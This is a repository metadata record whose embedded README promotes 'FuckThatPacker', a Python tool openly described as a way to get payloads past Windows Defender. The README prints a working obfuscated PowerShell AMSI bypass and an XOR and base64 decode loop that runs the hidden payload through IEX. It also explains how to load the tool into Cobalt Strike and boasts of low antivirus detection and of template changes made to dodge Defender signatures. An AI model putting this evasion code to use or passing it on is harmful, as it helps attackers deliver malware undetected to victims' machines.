{"id":13815181,"url":"https://github.com/Unknow101/FuckThatPacker","last_synced_at":"2025-05-15T07:32:05.766Z","repository":{"id":37781780,"uuid":"287210747","full_name":"Unknow101/FuckThatPacker","owner":"Unknow101","description":"A simple python packer to easily bypass Windows Defender","archived":false,"fork":false,"pushed_at":"2022-04-03T18:20:01.000Z","size":15,"stargazers_count":628,"open_issues_count":3,"forks_count":84,"subscribers_count":14,"default_branch":"master","last_synced_at":"2024-11-19T10:48:56.587Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Unknow101.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-08-13T07:26:07.000Z","updated_at":"2024-11-04T23:31:12.000Z","dependencies_parsed_at":"2022-07-12T16:52:43.432Z","dependency_job_id":null,"html_url":"https://github.com/Unknow101/FuckThatPacker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Unknow101%2FFuckThatPacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Unknow101","download_url":"https://codeload.github.com/Unknow101/FuckThatPacker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https
://github.com","kind":"github","repositories_count":254295966,"owners_count":22047179,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T04:03:05.777Z","updated_at":"2025-05-15T07:32:02.820Z","avatar_url":"https://github.com/Unknow101.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# FuckThatPacker\nA simple python packer to easily bypass Windows Defender\n\n# Basic usage\n\n```\n# python FuckThatPacker.py --help\n\n  ___        _   _____ _         _   ___         _           \n | __|  _ __| |_|_   _| |_  __ _| |_| _ \\__ _ __| |_____ _ _ \n | _| || / _| / / | | | ' \\/ _` |  _|  _/ _` / _| / / -_) '_|\n |_| \\_,_\\__|_\\_\\ |_| |_||_\\__,_|\\__|_| \\__,_\\__|_\\_\\___|_|  \n                                                          \n                                                                      \nWritten with \u003c3 by Unknow101/inf0sec\nv1.0\n\n\nusage: FuckThatPacker.py [-h] -k KEY -p PAYLOAD [-o OUTPUT]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -k KEY, --key KEY     integer key use of XOR operation\n  -p PAYLOAD, --payload PAYLOAD\n                        path of the payload to pack\n  -o OUTPUT, --output OUTPUT\n                        output payload into file\n```\n\n# Example\n\nBasic generation of XOR payload:\n\n```\n# python FuckThatPacker.py -k 32 -p /root/payload.ps1\n\n  ___        _   _____ _         _   ___         _           \n | __|  _ __| |_|_   _| |_  __ _| |_| _ \\__ _ __| |_____ _ _ \n | _| || / _| / / | | | ' \\/ _` |  _|  _/ _` 
/ _| / / -_) '_|\n |_| \\_,_\\__|_\\_\\ |_| |_||_\\__,_|\\__|_| \\__,_\\__|_\\_\\___|_|  \n                                                          \n                                                                      \nWritten with \u003c3 by Unknow101/inf0sec\nv1.0\n\n\n[+] Encode UTF16-LE\n[+] Cyphering Payload ...\n[+] Base64 Payload\n[+] Writting into Template\n[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType((\"{5}{2}{0}{1}{3}{6}{4}\" -f 'ut',('oma'+'t'+'ion.'),'.A',('Ams'+'iUt'),'ls',('S'+'ystem.'+'Manage'+'men'+'t'),'i')).GetField((\"{1}{2}{0}\" -f ('Co'+'n'+'text'),('am'+'s'),'i'),[Reflection.BindingFlags](\"{4}{2}{3}{0}{1}\" -f('b'+'lic,Sta'+'ti'),'c','P','u',('N'+'on'))).GetValue($null),0x41414141)\n$a = \"395zIEUgVCANIHMgVCBS[...]iBdICog\"\n$b = [System.Convert]::FromBase64String($a)\nfor ($x = 0; $x -lt $b.Count; $x++) {\n                $b[$x] = $b[$x] -bxor 32\n        }\nIEX ([System.Text.Encoding]::Unicode.GetString($b))\n```\n\n# CobaltStrike Integration\n\n17/03/2022 : FuckThatPacker is now integrated into CobaltStrike!\n\n## Setup\n\nAt this time, FuckThatPacker should be installed in /opt/Tools/FuckThatPacker (or you can manually edit the aggressor script).\nAfter this, you have to load the CNA script into Cobalt Strike (help: https://trial.cobaltstrike.com/aggressor-script/index.html)\nYou should have a new label under the attacks menu:\n\n![New label](https://i.ibb.co/8Xzhb0V/Screenshot-1.png)\n\nThen, you have to specify the listener, the key and the output:\n\n![Menu](https://i.ibb.co/x3ywKnS/Screenshot-3.png)\n\nThe payload will be generated and packed:\n\n![Packed payload](https://i.ibb.co/dG0SBr4/Screenshot-4.png)\n\n\n\n# AV Results\n\n![AV detection](https://i.ibb.co/fdQJD4Y/Screenshot-1.png)\n\n# Patch Notes\n\n13/11/2020 : Modifying template.txt for Defender signature 
:D\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FUnknow101%2FFuckThatPacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FUnknow101%2FFuckThatPacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FUnknow101%2FFuckThatPacker/lists"}